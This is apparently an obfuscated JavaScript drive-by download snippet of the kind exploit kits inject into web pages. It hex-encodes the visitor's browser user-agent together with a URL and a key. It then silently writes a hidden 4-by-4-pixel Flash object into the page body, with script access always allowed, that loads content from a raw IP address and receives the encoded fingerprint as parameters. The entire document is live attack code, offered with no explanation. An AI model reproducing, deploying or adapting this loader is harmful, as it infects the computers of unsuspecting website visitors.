/*s28901d48200hssfj40171fs*/function hgfgerdfgdf(num, width){/*s91809d79150hfj37601fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s84349d29510hfj89449fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s91232d86549hfj62751fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s35189d81426hfj59235fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd99442hfs*/c += b + d;/*s44621d94867hfj4795fs*/e += 1;}return c;}/*s38576dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.72.146/?ODM0ODYyNjg=&inform=MTM4NDI1NDg=&paper=xHzQMrPYbR3FFYDfKPrEUKdEMU7WA0eKwYyZha_VF5-xFDfGpbL1FxzspV-dCF-EmvJvdLMHIwKh1UfASwd&help=slam&mail=kyIwPVFtAoaiq2EPXzRefgpWFrBeKYgsU-5CVFbA-2l_wyLNAcMlywxSGuGMGn-gtVVgS4QgQmaz7VaCO-w&gift=NDkwNzU1MDA=", ghnvbn("http://188.225.72.146/?ODgyMTM1MDU=&help=gift&mail=kyI8PVFhAoauq2EDXzRSfgpWFrBeKYggU-5OVFbM-2lzwyLNAcMlywxeGuGAGn-stU1gV4AgVm6z7S6CJrg&paper=xH_QMrPYbR7FFYDfKPnEUKREMU3WA0SKwY-Zha_VF5-xFDfGpbL1FxzspVydCF-EmvFvdLAHIwGh1UfASwR&inform=NDY1MzI2OTg=&work=NDk4NzQ2MDA=","wexykukusw"));